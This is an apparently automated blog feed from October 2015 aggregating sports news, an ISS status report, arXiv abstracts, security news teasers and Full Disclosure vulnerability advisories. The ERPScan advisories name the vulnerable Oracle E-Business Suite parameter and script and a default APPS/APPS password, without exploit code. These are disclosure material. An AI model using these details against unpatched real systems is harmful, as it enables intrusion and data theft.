MADRID (AP) Barcelona defender Javier Mascherano will be able to face Real Madrid in the Spanish league next month after being handed only a two-game suspension for complaining to a linesman.

from FOX Sports Digital http://ift.tt/1Mt08mB
via IFTTT

Bremen's US striker Aron Johansson has groin surgery

BREMEN, Germany (AP) Werder Bremen says United States striker Aron Johansson has undergone groin surgery and will be out for several weeks.

from FOX Sports Digital http://ift.tt/1XyDtHn
via IFTTT

Brazil's Marin agrees to be extradited in FIFA bribery case

BERN, Switzerland (AP) Switzerland's justice ministry says 2014 World Cup organizing head Jose Maria Marin of Brazil has agreed to be extradited to the United States in the FIFA bribery case.

from FOX Sports Digital http://ift.tt/1kRnVQT
via IFTTT

Anonymous To De-Hood 1000 KKK Members

“We are not attacking you because of what you believe in as we fight for freedom of speech,” Anonymous said in a statement released last week.

from Google Alert - anonymous http://ift.tt/1k9VGMR
via IFTTT

It's Now Legal to Jailbreak Smart TV, Smartphone Or Tablet

In our previous article, The Hacker News reported that the EFF had won its battle over the limits that were put on a car's copyrighted software, allowing car owners to fiddle with their car's software. EFF has participated in the rulemaking procedure held by the United States copyright office (DMCA) earlier also, and this time they have got a bag full of success. As… ...Library of


from The Hacker News http://ift.tt/1N7mgBN
via IFTTT

Austria keeper Almer out for months with knee injury

VIENNA (AP) Austria goalkeeper Robert Almer will miss the team's friendly against Switzerland in November after partly tearing a ligament in his left knee.

from FOX Sports Digital http://ift.tt/1MTc5fG
via IFTTT

ISS Daily Summary Report – 10/27/15

Crew Half-Duty Day: Today was a reduced duty day for the United States On-orbit Segment (USOS) Crew in advance of tomorrow’s EVA.

Extravehicular Activity (EVA) Preparations: The USOS crew members made final preparations by setting up EVA tools, performing a tool audit, and preparing the Equipment Lock, and Extravehicular Mobility Units (EMUs). In addition, all three USOS crew reviewed related procedures and briefing packages. USOS EVA #32 (ISS Upgrades EVA) is scheduled to occur tomorrow with hatch opening taking place at approximately 7:15am CDT.

Plasma Kristall-4 (PK-4) Operations: Kononenko continued ongoing PK-4 operations by connecting the gas supply flexhose to the Neon gas supply, opening a valve to pressurize it, reporting the pressure, and then disconnecting the flexhose. An experiment run in PK-4 is planned to start tomorrow. Plasma Kristall-4 is a complex European Space Agency (ESA) plasma laboratory installed in the Columbus European Physiology Module (EPM) rack and operated by Russian crewmembers. PK-4 supports research in the field of Complex Plasmas: low temperature gaseous mixtures composed of ionized gas, neutral gas and micron-sized particles. The micro-particles become highly charged in the plasma and interact strongly with each other, which can lead to a self-organized structure of the micro-particles (i.e., “plasma crystals”).

Large Format Motion Picture Camera (IMAX): Kelly connected the IMAX Codex to a Station Support Computer (SSC) for a downlink of recorded video files. IMAX filmmakers intend to produce a three dimensional movie called A Perfect Planet, using ISS-based video and images to show how natural and human forces shape planet Earth. The film will also showcase NASA’s exploration efforts and highlight the ISS as a platform for scientific research and a stepping stone to deep space exploration.

Reaction Self-Test: Kelly completed a session today for the Reaction Self-Test investigation.
Reaction Self-Test helps crewmembers objectively identify when their performance capability is degraded by various fatigue-related conditions that can occur as a result of ISS operations and time in space (e.g., acute and chronic sleep restriction, slam shifts, extravehicular activity (EVA), and residual sedation from sleep medications).

Sleep Log: Kelly and Kornienko recorded Sleep Log entries today. The Sleep ISS-12 experiment monitors ambient light exposure and crew member activity and collects subjective evaluations of sleep and alertness. The investigation examines the effects of space flight and ambient light exposure on sleep during a year-long mission on the ISS.

Urine Processing Assembly (UPA) Status: Following yesterday’s Fluids Control Pump Assembly (FCPA) change out, today Ground Controllers updated pump parameters and successfully initiated a UPA process cycle. The process cycle is expected to complete later this evening.

Node 1 Nadir Common Berthing Mechanism (CBM) Checkout: Yesterday afternoon, Ground Controllers completed a successful checkout of the Node 1 Nadir CBM. This is a routine checkout performed every 6 months, and also serves as Launch Commit Criteria (LCC) for the planned OA-4 berthing in December.

Today’s Planned Activities
All activities were completed unless otherwise noted.

NEIROIMMUNITET. CORRECTSIA RUEXP – Blood Sample Insertion into MELFI Verification and report of antivirus scan results on Auxiliary Computer System (ВКС) laptops Purging Elektron-VM Liquid Unit (БЖ) after Shutdown Replacement of RS TORU trainer cable 17КС.30Ю8230А-2030 cable Progress 429 (SM Aft) Transfers and IMS Ops JEM Terminal Computer Reboot Hair Sample Cleaning ГЖТ4 (Gas-Liquid Heat Exchanger) ВТ-7 fan screen VIBROLAB.
Monitoring hardware activation Inspection and Cleaning of RS2 laptops No.1098 (POC22473J,СМ1РО_1_102), RS3 No.1144 (POC22519J,ФГБ1ПГО_4_426_1, bag 352-20 (00037779R) Demating wire harness W0142 On MCC GO RS1 Laptop Inspection and Cleaning Verification of ИП-1 Flow Sensor Position WRS – Recycle Tank Fill from EDV CARDIOVECTOR. Experiment Ops Relocating PBBs for upcoming EVA EVA Tool Config Final printout of EVA procedures ISS Crew Medical Officer (CMO) Computer Based Training (CBT) ABOUT GAGARIN FROM SPACE. Experiment Ops EVA2 Procedure Review Pille sensors prep for USOS EVA On-orbit hearing assessment using EARQ PLAZMENNIY KRISTALL. Gas Exchange in the Chamber for Neon IMAХ – Connecting to SSC USOS EVA Tool Audit WRS – Recycle Tank Fill from EDV Installation of RSK1 SW Version 1.11 and Checkout of TORU Relocation Simulator Wiping SM surfaces with Fungistat:  panels 128, 130, 131, 135 Water Transfer and Shell Compression of Progress 429 (SM Aft) Rodnik БВ1 tank Equipment Lock Preparation HAM radio session from Columbus IMS Delta File Prep СОЖ Maintenance VIBROLAB. Copy and Downlink Data IMAX – Terminate Battery Charge EVA Procedure Conference IMAX – Terminate Codex 512 GB Drive charge 24-hour ECG Monitoring (termination) 24-hour BP monitoring (terminate) IMAX – power down NEIROIMMUNITET. Stress Test NEIROIMMUNITET. Closeout Ops Reaction Self-Test (Sleep) On MCC GO Compression of Progress 429 (SM Aft) Rodnik Tank БВ1 – Closeout Ops Preparation of Reports for Roscosmos Web Site and Social Media ECON-M. Observation and Photography URAGAN Observations and Photography   Completed Task List Items RMS Laptop Terminal 2 (RLT2) Hard Disk Drive Installation RMS Laptop Terminal 3 (RLT3) Swap   Ground Activities All activities were completed unless otherwise noted. 
EVA Preparation Commanding Backup and Standby C&C MDM Swap S-Band String 1 Activation

Three-Day Look Ahead:
Wednesday, 10/28: ISS Upgrades EVA
Thursday, 10/29: 1/2 Duty Day, Post EVA activities, Plant gravity Sensing 2, VIABLE Training
Friday, 10/30: EVA Preparation, JEMAL ExHAM install.

QUICK ISS Status – Environmental Control Group:

Component: Status
Elektron: Off
Vozdukh: Manual
[СКВ] 1 – SM Air Conditioner System (“SKV1”): Off
[СКВ] 2 – SM Air Conditioner System (“SKV2”): On
Carbon Dioxide Removal Assembly (CDRA) Lab: Off
Carbon Dioxide Removal Assembly (CDRA) Node 3: Operate
Major Constituent Analyzer (MCA) Lab: Shutdown
Major Constituent Analyzer (MCA) Node 3: Operate
Oxygen Generation Assembly (OGA): Process
Urine Processing Assembly (UPA): Norm
Trace Contaminant Control System (TCCS) Lab: Off
Trace Contaminant Control System (TCCS) Node 3: Full Up

from ISS On-Orbit Status Report http://ift.tt/1N7i2dk
via IFTTT

You Can Now Hack Your Own Car — It's Legal Now

Yes, you heard right. You can now hack a car by making necessary modifications – but to the car owned by you, not your neighbors. Last year, President Obama passed a bill called 'Unlocking Consumer Choice and Wireless Competition Act,' following which users could unlock their devices – generally those locked under a contract – to use a specific service provider. The same year,


from The Hacker News http://ift.tt/1WientW
via IFTTT

Here's How Websites Are Tracking You Online

Webmasters can track all your activities on the Internet – even if you have already cleared your browsing history and deleted all saved cookies. A researcher demonstrated two unpatched flaws that can be exploited to track Millions of Internet users, allowing malicious website owners: List Building: To compile a list of visited domains by users, even if they have cleared their browsing


from The Hacker News http://ift.tt/1P4usCW
via IFTTT

Including Platini, FIFA accepts 7 in presidential race

GENEVA (AP) Seven men are in the running to replace Sepp Blatter as FIFA president, with Michel Platini's candidature pending because of his suspension from soccer.

from FOX Sports Digital http://ift.tt/1KERKJf
via IFTTT

FIFA accepts 7 entries in presidential race, Nakhid excluded

ZURICH (AP) FIFA says there are seven official entries for the presidential election to replace Sepp Blatter, with former Trinidad and Tobago player David Nakhid not on the list.

from FOX Sports Digital http://ift.tt/1S938mQ
via IFTTT

Warning: 18,000 Android Apps Contains Code that Spy on Your Text Messages

A large number of third-party Android apps have reportedly been discovered grabbing copies of all text messages received or sent to infected devices and sending them to the attackers' server. More than 63,000 Android applications use Taomike SDK – one of the biggest mobile advertisement solutions in China – to help developers display ads in their mobile apps and generate revenue.


from The Hacker News http://ift.tt/1PTHRyh
via IFTTT

Bright from the Heart Nebula


What's that inside the Heart Nebula? First, the large emission nebula dubbed IC 1805 looks, in whole, like a human heart. The nebula glows brightly in red light emitted by its most prominent element: hydrogen. The red glow and the larger shape are all created by a small group of stars near the nebula's center. In the center of the Heart Nebula are young stars from the open star cluster Melotte 15 that are eroding away several picturesque dust pillars with their energetic light and winds. The open cluster of stars contains a few bright stars nearly 50 times the mass of our Sun, many dim stars only a fraction of the mass of our Sun, and an absent microquasar that was expelled millions of years ago. The Heart Nebula is located about 7,500 light years away toward the constellation of Cassiopeia. At the top right is the companion Fishhead Nebula. via NASA http://ift.tt/1jNXN9y

Tuesday, October 27, 2015

How to keep the column value hidden or anonymous

But in the UI the business logic expects to keep the bidder name hidden or anonymous until a particular bid is accepted. Once the bid accepted button ...

from Google Alert - anonymous http://ift.tt/1NzI33r
via IFTTT

Ravens: NFL admits referee was distracted on opening drive vs. Cardinals that resulted in illegal formation penalty (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Redesigning pattern mining algorithms for supercomputers. (arXiv:1510.07787v1 [cs.DC])

Upcoming many core processors are expected to employ a distributed memory architecture similar to currently available supercomputers, but parallel pattern mining algorithms amenable to the architecture are not comprehensively studied. We present a novel closed pattern mining algorithm with a well-engineered communication protocol, and generalize it to find statistically significant patterns from personal genome data. For distributing communication evenly, it employs global load balancing with multiple stacks distributed on a set of cores organized as a hypercube with random edges. Our algorithm achieved up to 1175-fold speedup by using 1200 cores for solving a problem with 11,914 items and 697 transactions, while the naive approach of separating the search space failed completely.



from cs.AI updates on arXiv.org http://ift.tt/1ifePvt
via IFTTT

Learning Constructive Primitives for Online Level Generation and Real-time Content Adaptation in Super Mario Bros. (arXiv:1510.07889v1 [cs.AI])

Procedural content generation (PCG) is of great interest to game design and development as it generates game content automatically. Motivated by the recent learning-based PCG framework and other existing PCG works, we propose an alternative approach to online content generation and adaptation in Super Mario Bros (SMB). Unlike most of existing works in SMB, our approach exploits the synergy between rule-based and learning-based methods to produce constructive primitives, quality yet controllable game segments in SMB. As a result, a complete quality game level can be generated online by integrating relevant constructive primitives via controllable parameters regarding geometrical features and procedure-level properties. Also the adaptive content can be generated in real time by dynamically selecting proper constructive primitives via an adaptation criterion, e.g., dynamic difficulty adjustment (DDA). Our approach is of several favorable properties in terms of content quality assurance, generation efficiency and controllability. Extensive simulation results demonstrate that the proposed approach can generate controllable yet quality game levels online and adaptable content for DDA in real time.



from cs.AI updates on arXiv.org http://ift.tt/1ifePvj
via IFTTT

Interpolating Convex and Non-Convex Tensor Decompositions via the Subspace Norm. (arXiv:1503.05479v2 [cs.LG] UPDATED)

We consider the problem of recovering a low-rank tensor from its noisy observation. Previous work has shown a recovery guarantee with signal to noise ratio $O(n^{\lceil K/2 \rceil /2})$ for recovering a $K$th order rank one tensor of size $n\times \cdots \times n$ by recursive unfolding. In this paper, we first improve this bound to $O(n^{K/4})$ by a much simpler approach, but with a more careful analysis. Then we propose a new norm called the subspace norm, which is based on the Kronecker products of factors obtained by the proposed simple estimator. The imposed Kronecker structure allows us to show a nearly ideal $O(\sqrt{n}+\sqrt{H^{K-1}})$ bound, in which the parameter $H$ controls the blend from the non-convex estimator to mode-wise nuclear norm minimization. Furthermore, we empirically demonstrate that the subspace norm achieves the nearly ideal denoising performance even with $H=O(1)$.



from cs.AI updates on arXiv.org http://ift.tt/1Gr4zqH
via IFTTT

Jedinak, Ryan picked in Australia squad for WCup qualifiers

SYDNEY (AP) Captain Mile Jedinak and goalkeeper Mat Ryan have been recalled to Australia's squad for the World Cup qualifiers against Kyrgyzstan and Bangladesh.

from FOX Sports Digital http://ift.tt/1GHqS0g
via IFTTT

Premier League champion Chelsea and Arsenal exit League Cup

STOKE-ON-TRENT, England (AP) Chelsea's miserable start to the season continued on Tuesday after it was knocked out in the fourth round of the English League Cup by 10-man Stoke on penalties.

from FOX Sports Digital http://ift.tt/1P3uB9P
via IFTTT

Inter moves back top of Serie A with 1-0 win at Bologna

BOLOGNA, Italy (AP) Mauro Icardi ended his goalscoring drought to help Inter Milan move provisionally back to the top of the Italian league on Tuesday following a 1-0 win at relegation-threatened Bologna.

from FOX Sports Digital http://ift.tt/1NzliN0
via IFTTT

[FD] RootedCON 2016 CFP

[FD] Timing attack vulnerability in most Zeus server-sides

The vulnerability I've discovered is basically a timing attack which enables a remote attacker to resolve the length in characters of the reports directory name by carefully measuring the response time of the server. While this vulnerability may be considered low risk, as well as being found in a fraudulent piece of software, I find its nature to be a very interesting and intriguing case study which could be of good use for future researchers. And so I share it with you good people - http://ift.tt/1N3Vzy0

Rotem Kerner

Source: Gmail -> IFTTT-> Blogger

[FD] AoF and CSRF vulnerabilities in D-Link DCS-2103

Hello list! There are Abuse of Functionality and Cross-Site Request Forgery vulnerabilities in D-Link DCS-2103 (IP camera).

Source: Gmail -> IFTTT-> Blogger

[FD] [ERPSCAN-15-027] Oracle E-Business Suite - Cross Site Scripting Vulnerability

1. ADVISORY INFORMATION

Title: Oracle E-Business Suite Cross-site Scripting
Advisory ID: [ERPSCAN-15-027]
Advisory URL: http://ift.tt/1Wfh1FV
Date published: 20.10.2015
Vendors contacted: Oracle

2. VULNERABILITY INFORMATION

Class: Cross-site Scripting
Impact: impersonation, information disclosure
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-4854

CVSS Information
CVSS Base Score: 4.3 / 10
AV : Access Vector (Related exploit range) Network (N)
AC : Access Complexity (Required attack complexity) Medium (M)
Au : Authentication (Level of authentication needed to exploit) None (N)
C : Impact to Confidentiality None (N)
I : Impact to Integrity Partial (P)
A : Impact to Availability None (N)

3. VULNERABILITY DESCRIPTION

An anonymous attacker can create a special link that injects malicious JS code

4. VULNERABLE PACKAGES

Oracle E-Business Suite 12.1.4
Other versions are probably affected too, but they were not checked.

5. SOLUTIONS AND WORKAROUNDS

Install Oracle CPU October 2015

6. AUTHOR

Nikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)

7. TECHNICAL DESCRIPTION

CfgOCIReturn servlet is vulnerable to Cross-site Scripting (XSS) due to lack of sanitizing the "domain" parameter.

8. REPORT TIMELINE

Reported: 17.07.2015
Vendor response: 24.07.2015
Date of Public Advisory: 20.10.2015

9. REFERENCES

http://ift.tt/1QLXHJH
http://ift.tt/1Wfh1FV
http://ift.tt/1LVYPXZ

10. ABOUT ERPScan Research

The company’s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!). ERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013.
ERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies. ERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security. ERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few. We have highly qualified experts in staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research. 11. ABOUT ERPScan ERPScan is one of the most respected and credible Business Application Security providers. Founded in 2010, the company operates globally. Named an Emerging vendor in Security by CRN and distinguished by more than 25 other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to improve the security of their latest solutions. ERPScan’s primary mission is to close the gap between technical and business security. We provide solutions to secure ERP systems and business-critical applications from both cyber attacks and internal fraud. Our clients are usually large enterprises, Fortune 2000 companies, and managed service providers whose requirements are to actively monitor and manage the security of vast SAP landscapes on a global scale. Our flagship product is ERPScan Security Monitoring Suite for SAP. 
This multi award-winning innovative software is the only solution on the market certified by SAP SE covering all tiers of SAP security: vulnerability assessment, source code review, and Segregation of Duties. The largest companies from diverse industries like oil and gas, banking, retail, even nuclear power installations as well as consulting companies have successfully deployed the software. ERPScan Security Monitoring Suite for SAP is specifically designed for enterprises to continuously monitor changes in multiple SAP systems. It generates and analyzes trends in user friendly dashboards, manages risks, tasks, and can export results to external systems. These features enable central management of SAP system security with minimal time and effort. We follow the sun and function in two hubs located in the Netherlands and the US to operate local offices and partner network spanning 20+ countries around the globe. This enables monitoring cyber threats in real time and providing agile customer support.

Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
Phone: 650.798.5255
Twitter: @erpscan
Scoop-it: Business Application Security

Source: Gmail -> IFTTT-> Blogger

[FD] [ERPSCAN-15-026] Oracle E-Business Suite - SQL injection Vulnerability

1. ADVISORY INFORMATION

Title: Oracle E-Business Suite SQL injection
Advisory ID: [ERPSCAN-15-026]
Advisory URL: http://ift.tt/1XvOAkk
Date published: 20.10.2015
Vendors contacted: Oracle

2. VULNERABILITY INFORMATION

Class: SQL injection
Impact: SQL injection, RCE
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-4846

CVSS Information
CVSS Base Score: 3.6 / 10
AV : Access Vector (Related exploit range) Network (N)
AC : Access Complexity (Required attack complexity) High (H)
Au : Authentication (Level of authentication needed to exploit) Single (S)
C : Impact to Confidentiality Partial (P)
I : Impact to Integrity Partial (P)
A : Impact to Availability None (N)

3. VULNERABILITY DESCRIPTION

The problem is caused by an SQL injection vulnerability. The code comprises an SQL statement that contains strings that can be altered by an attacker. The manipulated SQL statement can then be used to retrieve additional data from the database or to modify the data.

4. VULNERABLE PACKAGES

Oracle E-Business Suite 12.1.3, 12.1.4
Other versions are probably affected too, but they were not checked.

5. SOLUTIONS AND WORKAROUNDS

Install Oracle CPU October 2015

6. AUTHOR

Nikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov (ERPScan)

7. TECHNICAL DESCRIPTION

One of SQL extensions (afamexts.sql) does not filter user input values which may lead to SQL injection. The only defense mechanism is a password for APPS. If an attacker knows the password (for example, default password APPS/APPS), he will be able to exploit SQL injection with high privilege.

8. REPORT TIMELINE

Reported: 17.07.2015
Vendor response: 24.07.2015
Date of Public Advisory: 20.10.2015

9. REFERENCES

http://ift.tt/1QLXHJH
http://ift.tt/1XvOAkk
http://ift.tt/1LVYPXZ

10. ABOUT ERPScan Research

The company’s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications.
It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!). ERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013. ERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies. ERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security. ERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few. We have highly qualified experts in staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research. 11. ABOUT ERPScan ERPScan is one of the most respected and credible Business Application Security providers. Founded in 2010, the company operates globally. Named an Emerging vendor in Security by CRN and distinguished by more than 25 other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to improve the security of their latest solutions. ERPScan’s primary mission is to close the gap between technical and business security. 
We provide solutions to secure ERP systems and business-critical applications from both cyber attacks and internal fraud. Our clients are usually large enterprises, Fortune 2000 companies, and managed service providers whose requirements are to actively monitor and manage the security of vast SAP landscapes on a global scale. Our flagship product is ERPScan Security Monitoring Suite for SAP. This multi award-winning innovative software is the only solution on the market certified by SAP SE covering all tiers of SAP security: vulnerability assessment, source code review, and Segregation of Duties. The largest companies from diverse industries like oil and gas, banking, retail, even nuclear power installations as well as consulting companies have successfully deployed the software. ERPScan Security Monitoring Suite for SAP is specifically designed for enterprises to continuously monitor changes in multiple SAP systems. It generates and analyzes trends in user friendly dashboards, manages risks, tasks, and can export results to external systems. These features enable central management of SAP system security with minimal time and effort. We follow the sun and function in two hubs located in the Netherlands and the US to operate local offices and partner network spanning 20+ countries around the globe. This enables monitoring cyber threats in real time and providing agile customer support.

Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
Phone: 650.798.5255
Twitter: @erpscan
Scoop-it: Business Application Security

Source: Gmail -> IFTTT-> Blogger